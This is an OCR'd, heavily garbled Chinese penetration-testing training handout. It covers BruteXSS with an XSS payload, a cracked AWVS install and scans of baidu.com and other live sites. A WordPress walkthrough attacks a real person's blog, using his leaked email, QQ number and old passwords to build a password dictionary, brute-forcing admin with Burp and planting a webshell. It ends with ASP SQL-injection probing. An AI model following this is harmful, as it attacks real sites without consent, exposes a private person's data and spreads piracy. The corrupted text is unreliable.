下 载 所 有 文件 ， 解 压 。 


还 需要 单词 列表 ， 原 版 的 wordlist.txt 有 20 条 语句 ， 只 能 执行 基本 的 XSS 检 
查 。 


https://github.com/ym2011/penetration/blob/master/BruteXSS/wordlist 
这 个 文件 有 100 条 语句 ， 可 以 执行 相对 全 面 的 XSS 检查 。 


https://github.com/ym2011/penetration/blob/master/BruteXSS/wordlist 
这 个 文件 有 200 条 语句 ， 可 以 执行 绕 过 WAF 的 XSS 检查 。 


https://github.com/ym2011/penetration/blob/master/BruteXSS/wordlist 
这 个 文件 有 5000 KEA o TARR A n H Lit Rit WAF 的 XSS 检查 。 


然后 为 了 模拟 被 测 页 面 ， 我 们 还 要 部 署 一 个 页 面 : 


\\XSS 有 反射 演示 
«form action="" method="get"> 
<input type="text" name="xss"/> 
<input type="submit" value="test"/> 
</form> 
<?php 
$xss = @$_GET['xss']; 
if($xss!--null)( 
echo $xss; 


} 
假设 我 们 能 够 通过 localhost/xss.php 来 访问 它 。 


首先 在 解压 处 执行 : 


python brutexss.py 





|l. ) dd s*wZ.-4.-— 
| oi Tf NANWAN NAN、 
| EE TdT 27 07 \ _) 1) | 
| /| | 和 INN IAANAN / / 


User :Ghostkey 

注意 :使 用 错误 的 有 效 载 闪 的 定义 
字典 可 能 给 你 积极 性 质 

更 好 地 使 用 字典 

提供 积极 的 结果 。 


[?] 选择 方法 : [G]GET 或 者 [P]Post (G/P): 


下 面 它 会 询问 我 们 一 些 配置 。 我 们 在 选择 方法 时 输入 G oc dae URL 时 输 
A http://localhost/xss.php?xss ， 这 里 一 定 要 把 参数 又 露出 来 给 它 。 然 后 字 
典 位 置 输入 wordlist.txt ， 大 家 也 可 以 尝试 其 他 字典 。 


[?] 选择 方法 : [G]GET 或 者 [P]Post (G/P): G 

[?] 输入 URL: 

[?] > http://localhost/xss.php?xss= 

[+] 检测 localhost TH... 

[+] localhost is available! Good! 

[?] 输入 字典 的 位 置 ( 按 Enter 键 使 用 默认 wordlist.txt) 
[?] > wordlist.txt 


之 后 程序 会 显示 结果 ， 告 知 我 们 该 页 面 存 在 XSS 漏洞 。 


[+] 从 指定 字典 加 载 载荷 ，,,,， 
[+] 25 攻击 载荷 加 载 ，, ， 

[+] Bruteforce 开 始 : 

[+] 测试 'xss' AX... 
[+] 0 / 25 攻击 载荷 注入 ,,， 
[!] Xss% A RI 


[!] 5X: XSS 
[!] Payload: </script>"><script>prompt(1)</script> 


[+] Bruteforce X ° 
[+] 1 参数 是 SEL? XSS. 
[+] 扫描 结 采 localhost: 


Eh e e + 
| Id | Parameters | Status | 
o DR 十 
| © | XSS | Vulnerable | 
ee tie Sea Se Gauss aseas + 


[2] [E] 结 束 进 程 \[A] 程 序 初始 化 


之 后 它 会 让 我 们 选择 ， 结 来 进程 的 意思 就 是 退出 ， 和 初始化 的 意思 就 是 重 新 开始 。 如 
RAR FE Ba Fa 其 他 东西 ， 我 们 输入 E e 


如 果 是 POST 扫描 ， 我 们 为 URL 输入 http://localhost/xss.php ， 为 数据 输 
入 xss= 就 可 以 了 。 


由 于 一 些 XSS 比如 储存 型 XSS 不 便于 自动 化 扫描 ， 这 个 工具 的 作用 仍然 很 有 限 ， 
遇 到 扫 不 出 来 的 漏洞 很 正常 。 
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功能 


AWVS FP Acunetix Web Vulnerability Scanner 是 一 个 网 站 及 服务 器 漏洞 扫描 软 
件 。 


E Acunetix Feb Vulnerability Scanner 10.0 (Consultant Edition) 





E File Tools Configuration Help 
| _) New Seen ||&. FY? 8 ZEY 5 Mle els / 


EMEN — = tÍ macunetix 









WEB APPLICATION SECURITY 





^ 

=}. > Tools Acunetix Web Vulnerability Scanner 

3h Site Crawler 

> Target Finder [e Web Scanner scan your web applications automatically for vulnerabilitie: 

A Subdomain Scanner 

» Blind SQL Injector ip» Tools ustomize your security assessments with an extensive set of tool: 
EI (> Web Services scan your web services automatically for vulnerabilities 
5 AP Test (> Configuration Application preferences and scanning profiles 
uthentication Tester 
B3 Compare Results & 6 | heck f ct updates find help. and modify your license 
e ane enera ec r proGuct updates, ind neip, and modify your license 

- Web Services 

q^ Web Services Scanner 

Py — Editor Common Tasks 

= onfiguration 

s n |] New Scan start a new website scan si 

4 - 
e igna Profiles A Acunatix Ltd © 2005-2014 All rights reserved Acunetix WVS v10.0 Build 20150627 
- er 

Q Program Updates Activity Window g 


1| Version Information 





7.16 13:44,42, Populate application menus ... 


e Purchase 7.16 13:44.43, Populate tool explorer ... ll 
ry User Manual 7.16 13:44.43, Load ServerInfo XML ... 
v 
= AcuSensor ; ~| 
Application Log | Error Log 
Read | | - 


e 自动 的 客户 端 脚 本 分 析 器 ， 允 许 对 Ajax fe Web 2.0 应 用 程序 进行 安全 性 测 
qx, © 

业内 最 先进 且 深 入 的 SQL 注入 和 跨 站 脚本 测试 

高 级 渗透 测试 工具 ， 例 如 HTTP Editor 和 HTTP Fuzzer 

可 视 化 宏 记 录 器 帮助 您 轻松 测试 web RAE | SR AD RAP AY DXX 

支持 含有 CAPTHCA 的 页 面 ， 单 个 开始 指令 和 Two Factor ( 双 因 素 ) 验证 机 
Fil 

丰富 的 报告 功能 ， 包 括 VISAPCI 依从 性 报告 

高 速 的 多 线程 扫描 器 轻松 检索 成 车 上 万 个 页 面 

e 智能 疏 行 程序 检测 web 服务 器 类 型 和 应 用 程序 语言 
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e Acunetix 检索 并 分 析 网 站 ， 包 括 flash E "7 ` SOAP 和 AJAX 
e 端口 扫描 Web 服务 器 并 对 在 服务 器 上 运行 的 网 络 服务 执行 安全 检查 


下 载 和 安装 
演示 中 使 用 的 是 AWVS 10 版 本 ， 请 在 这 里 下 载 。 


安装 部 分 主要 分 为 两 个 步骤 : 安装 主 程序 和 打破 解 补 丁 。 这 款 工 具 是 由 吾 爱 破解 亲 
操 刀 来 破解 的 。 





我 们 打开 安装 文件 之 后 ， 依 次 点 击 “ 下 一 步 " 就 可 以 了 。 


w AYYS 安 装 程序 以 及 破解 程序 _ 上 口 | XI 
Tet) SmE ERO) Wea) TAG wea 


Q7 - O- B| Lae Px [En 











@ - C:\Documents and Settings \Admini str: i ‘Setup 一 Acunetix Feb Vulnerability Scanner F fej [304 
文件 和 文件 夹 任务 Y Welcome to the Acunetix Web 
Vulnerability Scanner Setup 
其 它 位 置 A Wizard 
© AD This will install Acunetix Web Vulnerability Scanner 10.0 on 
O 我 的 文档 D your computer. 
o RES It is recommended that you close all other applications before 
y 我 的 电脑 continuing. 
«3 网 上 邻 拓 Click Next to continue, or Cancel to exit Setup. 
详细 信息 a 


2015 06 23 00 webvulns: 
应 用 程序 
修改 日 期 : 2016 年 7 月 16 日 +> 
X, 13:18 


大 小 : 44.0 MB 





: Tz Self-Extract Setup 





公司 : Igor Pavlov 文件 版 本 : 3.12.0.0 创建 日 期 : 2016-7-16 13:16 ;44.0 MB |. 我 的 电脑 A 
安装 完毕 之 后 ， 打 开 破 解 补丁 ， 破 解 补丁 是 全 自动 的 ， 等 到 出 现 这 个 界面 ， 就 说 明 
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E u-— Feb X ee m — Teb Activation 


Summary 
BE Connectio 可 Activation summary 


jl we 


Mer e 
— Summary 


BEEN i 


— laily[LCG] E-mail: Mmily@52PoJie.Cn 


Acunetix Web Vulnerability Scanner 10.x Consultant Edition KeyGen By Hmily[LCG] 
If you d like to Crack, Please go to http://www. S2pojie. cn! 














abe 4. Ehcunetis Teb Volnerabili 
i File Actions Tools  Confi 


E Scan Type 
Options 
| Eh 
| Logn 
B— Fimish 








首先 ， 打 开 程 序 主 界面 : 
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fa) Acunetix Yeb Vulnerability Scanner 10.0 (Consultant Edition) 





5 File Tools Configuration Help 












@Macunetix WEB APPLICATION SECURITY 
» Web Scanner : c ers 
-Ey Tools Acunetix Web Vulnerability Scanner 
~- Site Crawler 
) Target Finder - Web Scanner | Scan your web applications automatically for vulnerabilities 

A Subdomain Scanner | 7 | 

j Blind SQL Injector (c» Tools Customize your security assessments with an extensive set of tools 
| = pi dal (> Web Services Scan your web services automatically for vulnerabilities 








4 HTTP Fuzzer (= Configuration | Applic ation preferences and scanning profiles 
8 Authentication Tester 


E Compare Results (*» General | Check for product updates, find help, and modify your license 
E-E Web Services 
q^ Web Services Scanner 
e Web Services Editor 
=} Configuration 


s "pp" T |] New Scan | Start a new website scan 
4| Scan Settings =| 


Xj Scanning Profiles 





Common Tasks 


A Acunetix Ltd © 2005-2014 All rights reserved, Acunetix WVS v10.0 Build 20150623 
Ec General 
9 Program Updates Activity Window q 


(0) Version Information 





07.16 14:59,02, Populate application menus ... 


2 —— - 07.16 14:59.02, Populate tools bar ... 

e Eos 07.16 14:59.02, Populate tool explorer ... | 
= 07.16 14:59.03, Load ServerInfo XML ... 

@) User Manual ’ ET 
* AcuSensor 


] Application Log | Error Log 
[Ready | | Ai 


ARELA scan 按钮 ， 会 弹出 一 个 窗口 ， 我 们 将 其 中 的 website URL KAA 
度 的 URL。 这 里 我 们 拿 百度 主页 来 演示 。 





AES Tis "PUTEM és JP— US. -— - EN Y d ed sed 
; File Ac Scan Fizard xl 
: Scan Type Scan Type 
^ Options Select whether you want to scan a single website or analyze the results of a previous crawl. 
| ME E start 
| Login g e ECURITY 


E Finish 

Here you can scan a single website. In case you want to scan a single web application and 

n virides site you can enter the full path below. The application supports HTTP and 
TPS websites. 


ʻe Scan single website 


Website URL: EC html5. vulnweb.com -] 


d If you saved the site structure using the site crawler tool you can use the saved results here. 
E The scan will load this data from the file instead of crawling the site again. 





( Scan using saved crawling results 











% ‘ Filename: | ha 5 

gl : 
A: 10150623 
Geni 
9 If you want to scan a list of websites, use the Acunetix Scheduler. EE: 
i | Y'ou can access the scheduler interface by clicking the link below. ^ 
a | ! http: //localhost:31 83/ 

Il acunetix | 
& | 
Ano | 

了 | 

VA 


后 我 们 只 需要 连续 点 击 下 一 步 ， 跳 过 Option 界面 。 我 们 可 以 看 到 Target % 
BH ADR 了 一 些 信息 ， 比 如 服务 器 版 本 。 我 们 也 可 以 按 需 选择 服务 器 所 使 用 的 
环境 o 


Sean Wizard ESSSSZ Z S x] 


B— Scan Type Target 
^ Options Please wait until the scanning is finished. You can also adjust details such as operating system, webserver, 
| technology or change the base path. By entering these details you can reduce the scanning time. 


Target 
| Login 
O Finish 


lage information 


Ef ow. baidu.com:80 
~ Base path / 
Server banner Bw5/1.1 
Target URL http://www. baidu. com: 807 
A system Unknown 





«J| 


M'eb5erver 
E] Optimize for following technologies [SP CR >a 
ASP Ld 
ASP.NET 
PHP i] 
Perl [ | 
Java/AJ2EE [] 
ColdFusionZJrun v 
Python LI 
Rails 
FrontPage | 





acunetix | Status: Done 





« Back | Next > Cancel i 


点 击 下 一 步 之 后 ， 我 们 来 到 了 Login 界面 ， 这 里 我 们 可 以 设置 登录 所 需 的 凭证 。 
我 们 这 EARR. 


Scan Tizard k x] 


Scan Type Login 
Options Configure input/login details for password protected areas or HTML Forms 


Target 


Login Forms Authentication 
Finish 





BARIRZIENLIDJZE)I ee LG EU ded ERU La pa ee 


If pour website requires forms authentication, you need to record the steps required to login on the 
website. This will be saved as a login sequence file and can be used later. 

‘You can also specify a section of the website which vou do not want to be crawled [for example 
links that will log vou out from the website]. 


I = E ` " " " | | " " | : r " L zm, a 
«no login sequence» +| |] 





Login sequence: 








Automatic Forms Authentication 





©.) © Tiy to auto-login into the site 
— 


Website's forms authentication in some cases can be identified automatically, 

The automatic detection will try to identify the steps necessary to log in, the restricted links which 
should not be clicked in order to keep the session and the pattern by which a valid session can be 
identified. 


Please enter your credentials below. 
Usemame: | 
acunetix Password: | 


< Back | wee | Cancel | 











再 点 击 下 一 步 ， 等待 一 下 ， 然 后 就 开始 了 。 扫 描 完成 之 后 ， 我 们 再 来 看 主 界 面 。 


OAcunetix Feb Vulnerability Scanner 10.0 (Consultant Edition) 



































* File Actions Tools Configuration Help 
i New Scan |© j 2 > Be 5 l| JIE EA | 
JToolsExplorer — a| LJ | ib | id ed | di Report | P | Start URL: http://www, baidu.com:80/ z| Profile; | Default 司 | © stop a 
| tede xar Scan Results | Status | 
ES Tools Eb $$ Scan Thread 1 ( http://www.baidu.com:80/ ) Crawling 二 | | © Crawler state DeepScan running 
T Gh Site Crawler =). iy Web Alerts (8) © Files 29 
J Target Finder =- @ HTML form without CSRF protection ... © Directories 40 
E Subdomain Scanner =- @ clickjacking: X-Frame-Options heade... @ variations 117 
Blind SQL Injector 由 - @ Session token in URL (3) © Completed requests 259 
E53 HTTP Editor E- @ Broken links (1) @ Pending requests — 112 


©) HTTP Sniffer 
> HTTP Fuzzer 
8 Authentication Tester 
E? Compare Results 
[2-47 Web Services 
4) Web Services Scanner 


由 - @ GHDB: robots.txt file (1) 

由 - @ GHDB: robots.txt with Disallow tag (1) 
g > Knowledge Base 
| Site Structure 


Ed E! 








OK 





47" Web Services Editor HOA ups 
| => Configuration 由 - 团 aladdin Found 
* Application Settings 由 - (gg cache OK 
¥ Scan Settings B © duty OK 
| 2) Scanning Profiles 由 - 团 forbiddenip Found 
| 5 General E " 
9 Program Updates F c gaor "ina 
[1.5] Version Information H- [BS d his 
(P Licensing i+} e js Found 
Æ) Support Center [@ home.html OK 
@) Purchase 型 外 homepage Found 
| Æ) User Manual 团 img Found 
| ™ AcuSensor 由 - 团 search Found 
Ri- ie (ej more OK 
e (ej shifen OK 
= g baidu Found 
&-[g) i) baidu.html OK 
[O Â content-search.xml OK 
a @ cpro Found 
H- 园 六 link Found 
[È robots.txt OK 
&-[ s OK 
由 - 团 tools Found 了 | 
Activity Window 
07.16 15:00.58, Requested: https://passport.baidu.com/v2/?reggetcodestr&token-F7ea64b2b20e2ed60251d5e49a1d26e5&tpl2mn&apiver-v3&tt-14686524586568fr-login&vcodetype-&callback-bd — cbs — abt9ji 一 
07.16 15:00.58, Requested: https: !/passport.baidu.com/v2/?reagetcodestr&tokenzc23dcc02a3ae2 1d29651 1214! 9Sb&tolemn&apiverz y3&tt- 14686524586788fr-login&vcodetvpe-&callbackebd drw5a8 mla Gil 





Web Alerts 中 会 提示 存在 的 漏洞 。 Site Structure 中 会 显示 站 点 结构 。 我 们 
随便 选择 一 个 漏洞 看 一 下 。 它 提示 了 站 点 中 有 一 个 CSRF RB e 


a AWVS 










WEB APPLICATION SECURITY: 
Bg Y Scan Thread 1 ( http://www. baidu.com:80/ ) fV acunetix 


=} iy Web Alerts (8) 
E © HTML form without CSRF protection ... 





HTML form without CSRF protection 





- [sl /gaoji/preferences, html 
a @ Clickjacking: X-Frame-Options heade... Vulnerability description 
由 - @ Session token in URL (3) ; " "T 
&- @ Broken links (1) This. alert may be a false positive, manual confirmation is 
required. 
由 - @ GHDB: robots.txt file (1) 
@ GHDB: robots.txt with Disallow tag (1) Cross-site request forgery, also known as a one-click attack or 
T Knowledge Base session riding and abbreviated as CSRF or XSRF, is a type of 
B a Site Structure malicious exploit of a website whereby unauthorized commands 
Bg! ok are transmitted from a user that the website trusts. 
Qi) hw Acunetix WVS found a HTML form with no apparent CSRF 
OBA olime protection implemented. Consult details for more information 
| BA pub aboutthe affected HTML form. 
—À usa This vulnerability affects /aaoji/preferences html. 
" Á a Discovered by: Crawler. 
m cache OK 
@ duty ok Attack details 
团 Forbiddenip Found Form name: f2 
A) gaoji Found Form action: httpvwww.baidu.com/gaoji/preferences.html 
B B a his Form method: GET 
j F 
Fe tani Lon Form inputs: 
me,htm e 351 [Radio] 
团 (3j homepage Found e SL [Radio] 
a Found 
团 img oun e NR [Select] 
团 search Found e ime [Select] 
28 m ie e issw1 [Select] 
B d) badu Mim e sh [Radio] 
a oun e SU [Hidden] 
| B [HÂ baidu.html OK 
[O & content-search.xml OK 
w y cpro Found E Y View HTTP headers 


这 里 就 有 可 能 是 个 误 报 ， 虽 然 AWVS (KS X c BARRIE ILA o ARV 
碰 到 的 时 候 无 视 它 就 好 了 。 


登录 后 的 扫描 


Login 
Conhgure input/login dels for password protected areas or HTML forms 





Login | Forms Authentication 

全- (© Use pre-recorded login sequence 
lf your website requires forme authentication, you need to record the steps required to login on the 
webstee. This wil be saved a: a logn sequence file and can be used Ister. 


You can also specify a section of the website which yq, «do not want to be crawled [for example 
inks that will log you out from the website] 


Login sequence: [eno login sequence] -] La 





就 是 在 Login Ami] Form Authentication 分 组 框 中 输入 所 需 的 Cookie。 我 们 
点 击 党 边 的 “新建 "按钮 (一 张 纸 的 图 标 ) ， 在 弹出 来 的 窗口 中 登录 网 站 ， 来 创建 登 
KAW © 
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™) Login Sequence Vizard — http://www. baidu. com 


1. Record gin Action 2. Record Restrictions 3. Detect Ve 


€ 3 5 https: / /www. baidu. com/ "AE d | dd" i 


exse ed: @ Navigate to http://www. baidu. com 


ink ax iu hao123 地 图 视频 贴吧 PE J Click on A named tj login 














C 短信 快捷 登录 
[p 下 次 自动 登录 PAHAM 
立即 注册 


可 以 使 用 以 下 方式 登录 


é « = 
oru BREA — 62016 Baidu PRASANT BOLE 京 ICP 证 0301] 


-PAE 
@ 京 公 网 安 备 11000002000001 号 





No action selected 





A La rw 


毕 之 后 点 击 右 下 角 的 Finish ， 然 后 会 弹出 来 一 个 文件 选择 框 ， 保 存 文 件 即 








= x x s A vw Ə 
: b 
地 图 @ Navigate to http://www. baidu. com 

. 9 Click on A named tj login etiz Threat Level 2 

Dr more medium-severity type 
J Click on A with text “QQ 帐号 ” erabilities have been discovered 
- e scanner. You should 
_) Click on SPAN with id img out 112391882 Etigate each of these 

rabilities to ensure they will 
J Click on SPAN with text “确定 escalate to more severe 


u ems. 








70 

0 

1 | 

c NENNEN 

s] 

idu. com: 80/ T) 

p——————3 

文件 名 四 z ea 9 





保存 类 型 OD: [Login Sequence (*.lsr) "| 取消 | 


5i 
E] R504 SHLHARERR 身份 暴露 受 处 分 
腾讯 新 闻 07-15 23:26 
NASA 公 布 月 球 掠 过 地 球 珍贵 照片 一 年 只 能 拍 到 2 次 
(Ad 
| 





江东 音符 ”07-15 15:21 
| 
i a | Type: [ ' elick ”| 
E] 韩 总 理解 释 “ 萨 德 " 唱 “和 蛋 洗 ”“ 对 峙 "持续 6 小 时 PS | Target: [//mvtai c "1" /ALT] 
- E | 


MRIS) 07-16 01:59 af 
| 1 


Application Log Error Log | 


ease ae ease eve sarae ames 


Zea Reese (文件 夹 的 图 标 ) ， 选 择 刚 刚 保存 的 文件 ， 并 点 
击 Next 。 这 样 我 们 就 能 执行 登录 状态 下 的 扫描 
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批量 扫描 
5% KA: http://zone.wooyun.org/content/20325 。 
利用 AWVS 会 采集 目标 站 点 的 外 链 的 特点 ， 达 到 批量 扫描 的 效果 。 


ite Enos B :http://zone.wooyun.org/content/20325 


P | in Typ: Finish 
利用 AWVS 会 根据 目标 站 内 的 外 链 采 集 的 特点 来 达 MI Aten trang bo velo parana, we hove compia o tof econmandulon is he curet sen 
到 一 个 批量 扫描 的 效果 。 EAM .. 
p 求 :本 地 有 网 站 的 环境 ; LX A [TIE TU ILC NB 外 | 


np eria You can verity d a specific server 
eque indere sensor setings 


| - Catone | 
Em Cate insensitive 
server 
i It seems that the server is using CASE insensitive URLs. If you want to set case neensiive 
«P» Gaving check below. otherwise value kom setings vill be used 
"2 If you saved the site structure ; iw. CASE insensitive croning 
The scan will load this data from the Ctowing the site again. 
Additional hosts detected 


Deam RS" t in the scan 
Ensure — * you have permis exon to scan the ho 
c ^ ^ 
9m T E 
^ a a 
n ef son 


‘re com lisi 9i: zj 





acunetix 


4 
zl eee LLL E 








比如 ， 我 们 可 以 创建 一 个 HTML 文件， 里面 包含 要 扫描 的 全 部 链接 ， 比 如 我 们 要 扫 
描 谷 歌 、 百 度 、 优 酷 以 及 其 他 网 站 ， 我 们 就 可 以 新 建 一 个 A.html ， 内 容 为 : 


«a href="http://www.google.com">test</a> 
«a href="http://www.baidu.com">test</a> 
«a href="http://www. youku.com">test</a> 


然后 将 这 个 页 面 在 本 地 部 署 ， 假 设 ， 我 们 可 以 通 
过 http://localhost/subject/4.html 访问 。 然 后 将 其 填写 
到 Website URL 中 。 
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Scan Tizard x 
Scan Type Scan Type 
W Options Select whether you want to scan a single website or analyze the results of a previous crawl. 


E Target 

| 

Losin | 
W Finish 





«J Here you can scan a single website. In case you want to scan a single web application and 
— not the whole site you can enter the full path below. The application supports HTTP and 
HTTPS websites. 





'* Scan single website 








Website URL: [http;//localhost/subiect/4. html 
Drip. 






http: //testhtml5. vulnweb. com 
http: //"testphp.vulnweb.com 
http: /"/"testasp.vulnweb.com 
http: /"testaspnet.vulnweb.com 







: If vou saved t 
EZ The scan will 






( Scan using saved crawling results 


Filename: | 局 E. 


If you want to scan a list of websites, use the Acunetix Scheduler. 
You can access the scheduler interface by clicking the link below. 


http: //"localhost.8183/ 





acunetix 





一 直 点 击 “ 下 一 步 *， 直 到 Finish 界面 ， 我 们 可 以 看 到 ， 我 们 指定 的 站 点 全 部 出 现 
在 下 方 的 列表 框 中 ， 我 们 把 他 们 全 部 勾 选 。 之 后 点 击 Finish 按钮 开始 批量 扫描 。 


工具 篇 AWVS 






Scan Vizard | E 
W~ Type Finish 
a Options After analyzing the website responses, we have compiled a list of recommendations for the current scan. 
| Targel 
"Tq = 


Finish 





Install the sensor on your target server(s]. If the sensor is already installed, set the correct 
password for the server(s] by clicking on customize. You can verify if a specific server responds 


by using the test button from the sensor settings. 
R Customize | 


Case insensitive server 


- It seems that the server is using CASE insensitive URLs. If vou want to set case insensitive 
AJ crawling check below, otherwise value from settings will be used. 


Iw. CASE insensitive crawling 


Additional hosts detected 
< ) 2ome additional hosts were detected. Select the hosts to include in the scan. 
AJ Ensure that you have permission to scan the hosts selected. 





O www. youku.com 


ASEE AI YYxVxVxgqgy VXmmiGAAAIL 
| Save customized scan settings - 








实战 篇 WordPress 


米 斯 特 白 巾 培训 讲义 实战 篇 WordPress 


讲师 : ghOstkey 
整理 : 飞龙 
WB : CC BY-NC-SA 4.0 
目标 是 http://hzwer.com ° 
首先 有 学 员 社 到 了 他 的 个 人 信息 和 老 密 码 : 





文件 ] Xeno duet esc -016-07-24 下 午 52411 i 和 查 不 到 的 啊 Y 

| Pat. (VAR S A DUEERED) 篮球 相当 强悍 之 : 

FETE NER www 17127213 @ 163.com----286300346 
Nwite: > 2016-07-24 下 午 5:24:36 www Gsina.com----286300346 

Bi www TT Gsina.com----a€ 7721229 
Nwtt«sy > 2016-07-24 FÆ 5:24:47 

P o 

SER <he. n» 2016-07-24 下 午 5-2451 , . 这 些 事 老 的 数据 了 za 

EN 
Nwtt « sy" 2016-07-24 "FA 5:25:02 

BSNS 文学 的 文 


然后 我 们 利用 www.caimima.net 这 个 网 站 来 生成 字典 。 


我 们 在 “姓名 简 拼 ”中 输入 “hzw”，"“ 英 文 名 ”中 输入 “hzwer”， 姓 名 全 拼 中 输 
A“huangzhewen” > “QQ 号 "中 输入 “598460606”，“ 历 Xx og Ah” P i “286300346” ° 


huangzhewen 
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实战 篇 WordPress 


最 有 可 能 使 用 的 密码 


hzw286300346 h286300346 hzwer286300346 Hzwer286300346 h286300346 
hzw598460606 h598460606 hzwer598460606 Hzwer598460606 h598460606 
hzw520 hzw5201314 hzw1314 hzw123 hzw123456 

huangzhewen520 huangzhewen123 huangzhewen1314 hzwer520 hzwer5201314 


ARES 
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实战 篇 WordPress 


(7 € CQ @ Y*r Qhttp//www.caimima.net/index.php?act-view 


I> | E") hzwer.com - Home x | lasse Sot A XB w > 





1d 
WWW, 


285300346 
2656300346. 
hzw285300346 
hzw286300346. 
285300346hzw 
286300346hzw. 
h285300346 
h286300346. 

HZ 2863003546 
HZW286300:54b. ! 
2806300346HZW t 
260b3003546HZW. 
H286300346 
H285300546. 
hzwer286300346 
hzwerz5550054b. 
2653005d6hzwer 
26b530053456hzwer. 
HZWER286300346 
HZWER286300346. 
266300346HZWER 
2856300546HZWER. 
a285300346 
a2663500346. 
A286300346 
A286300346. 
qq286300346 
qq286300346. 
00286300346 
00286300346. 
yv266300346 
vv¥2663500346. 

Y¥ 286300346 
112565005346. 
aa2856300346 
aaz85300346. 
AA286300346 
AÀ2563500346. 
abc286300346 
Ahc?9g30034£ 


把 这 个 东西 保存 为 hzwer.txt 。 
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实战 篇 WordPress 


然后 他 的 网 站 是 WordPress 程序 ， 登 录 页 面 是 wp-login.php ， 直 接 访问 它 。 我 
们 尝试 为 用 户 名 输入 admin ， 密 码 随便 输入 然后 提交 : 








错误 : 为 用 户 名 adain 指 定 的 密码 不 正确 。 


用 性 名 或 电子 邮件 地 址 


admin 


2 


| 
Os PRGE 


记 住 我 的 登录 信息 








— = 


显示 “为 用 户 名 admin 指定 的 密码 不 正确 "， 说 明 用 户 名 admin 是 存在 的 。 
接 下 来 要 爆破 响 码 ， 打 开 Burp 抓 包 : 
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实战 篇 WordPress 


Comment this item (2) 
es? 


^ | SMCIUR. .| BE. 
POST /wp-login.php HTTP/1. 





AL 3X 8| Intruder， 进 行 爆破 。 选 择 之 前 保存 的 字典 : 
http://ww2.sinaimg.cn/large/841aea5S9jw1fb49r8kmxnj20ye0r576g.jpg 
爆破 成 功 之 后 ， 登 录 后 合 ， 鼠 标 移动 到 左 侧 的 “插件 ”， 然 后 点 击 " 安 装 插件 ”: 
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实战 篇 WordPress 


= € X Ô Yr Qhtto://hzwer.com/y 


I> | 添加 播 件 . hzwer.com— Wo x | Di SES -精准 分 析 个 人 密码 | 


3O6O0Sc€sux* BeA AEG? (Scene 











An s 


WW, A hzwer.com En 路 新 建 


RE 


欢迎 使 用 WordPressl 
我 们 准备 了 几 沾 链接 供 您 开始 ; 


开始 使 用 


P FH li anyue theme 


BWP Sitemaps 

Er th 
EF10:47 今天 BestCoder Ro 
ES Term Order § 10:24 075208 [cf£688X 1 Coc 
下 午 2:25 07 月 16 日 AHSOFNU NOIP: 





@) BYP Minify 
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实战 篇 WordPress 


在 之 后 的 页 面 中 点 击 * 上 传 插件 ”。 


添加 插件 


特色 — 3] lU 收藏 


fat AWordPresssR MSD kee HOTU SUS MIAH BE 


Jetpack 由 WordPres 


Increase your traffic, view 
la speed up your site, and pro 
from hackers with Jetpack. 


SBAutomatticeys 


www d (927) 
100 万 + 泣 跃 安装 w weir 





我 们 把 一 名 话 写 入 a.php ， 将 它 压缩 为 b.zip 。 然 后 在 上 传 页 面 处 选择 该 文件 
Js 9 点 击 “ 现 在 安装 ” 





添加 插件 em 


如 采 您 有 . zip 格 式 的 插件 文件 ， 可 以 在 这 里 通过 上 传 安装 它 。 


— 


b. zip 现在 安装 


J- 


WebShell £442] J /wp-content/upgrade/b/a.php 。 拿 菜刀 连接 便 可 成 功 拿 到 
Shell ° 
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Cl hzwer. com 
ce /hone/ geekcon/ don \ns/hrwer. com/ v | 读 职 | EHAA 2016-07-24 六 月 廿 一 
103. 28. 248. 120 目录 (7), 文件 (0) ZER 时 间 属性 日 回 站 占 类 别 
=T 门 | ES 
— 加 stats 2016-07-24 00 0755 - Se 
日 h | 4 type 
pd i public ftp 2013-11-06 17:31:14 4096 j111 G 
日 C geekcom I 一 上 > Bau 
日 加 domains C logs s "Ua 
日 om Ge htpasswd 2013-11-08 17 
= ee : public html 2018-07-24 1 
cgi-bin " 
e wp-admin C private html 2013-11-06 19:49:1 
回 wp-content Q Bisa iia 2013-11-06 20:21 
IC wp-includes 
(Cà 2048 





2016-07-24 00:12:26 


ae stats 

C public ftp 

I3 logs 

ae . htpasswd 

ae private html 
O Emp iia? 





RMAF AIS VA SL 实战 篇 南方 Oday 


讲师 : ghOstkey 
整理 : 飞龙 
协 以 : CC BY-NC-SA 4.0 


搜索 


KET] : inurl:"HomeMarket.asp" ° 


下 载 与 部 署 


http://www.]b51.net/article/5336.htm 


SQL A 


我 们 打算 检测 其 中 的 SQL 注入 漏洞 ， 由 于 ASP 代码 基本 没有 什么 好 的 过 滤 ， 一 般 
一 查 一 个 准 。 为 了 搜索 SQL 注入 漏洞 ， 我 们 可 以 使 用 sql ^ conn 这 类 名 称 、 或 
者 execute 这 类 函数 来 定位 到 数据 库 查询 低 吗 位 置 。 


比如 在 NewsType.asp 的 14~ 32 行 ， 我 们 发 现 了 : 


<% 
BigClass=request("BigClass") 
SmallClass-request("SmallClass") 


%> 

<% 

if BigClass<>"" and SmallClass<>"" then 

sql="select * from News where BigClassName-'"& BigClass &"' and 
SmallClassName-'"& SmallClass &"' order by AddDate desc" 

set rs-conn.execute(sql) 

do while not rs.eof 

%> 


我 们 看 到 这 有 是 文本 型 的 参数 ， 也 就 是 说 我 们 注入 的 时 候 要 想 办 法 闭合 单 引 号 。 而 且 
它 用 的 是 Access 数据 库 ， 我 们 没 办 法 像 MySQL 和 SQLServer 那样 使 用 -- 来 注 


我 们 照旧 为 Smallclass 输入 ' and '1'='1 > #93289 URL 
为 NewsType.asp?SmallClass=%27%20and%20%271%27=%271 ， 发 现 正 常 。 


€ e 5 localhost/NewsType.asp?SmallClass-95279620and96209627 19627 -* 0271 r a = 
H 应 用 Qto-md = 实验 吧 Ô istic B) 至 爱 破解 & Google 翻译 其 他 书签 


javastr-"" javastr-javastr*"" javastr-javastr*' " javastr-javastr* ”javastr=javastr+ " javastr-javastr-*" 
| xj. [2007-9-10] (点 击 9217)” 
javastr=javastr+ 
[2007-9-10] (451814726) " 
javastr-javastr*" 
[2007-9-10] 


javastr- javastr- 


~ JJ 








































(点 击 9788) | 




















”document. write (javastr) 


输入 ' and '1'='2 ， 构 造 的 URL 
为 NewsType.asp?SmallClass=%27%20and%20%271%27=%272 ， 发 现 错误 。 





€ Q D localhost/NewsType.asp?SmallClass=%27%20and%20%271%27=%272 y ja 三 
=i 应 用 Qto-md = 实验 吧 中 iK M Sew Dy Google Miz O 其 他 书签 


javastr= ”javastr=javastr+ ”javastr=javastr+ 
” document. write (javastr) 


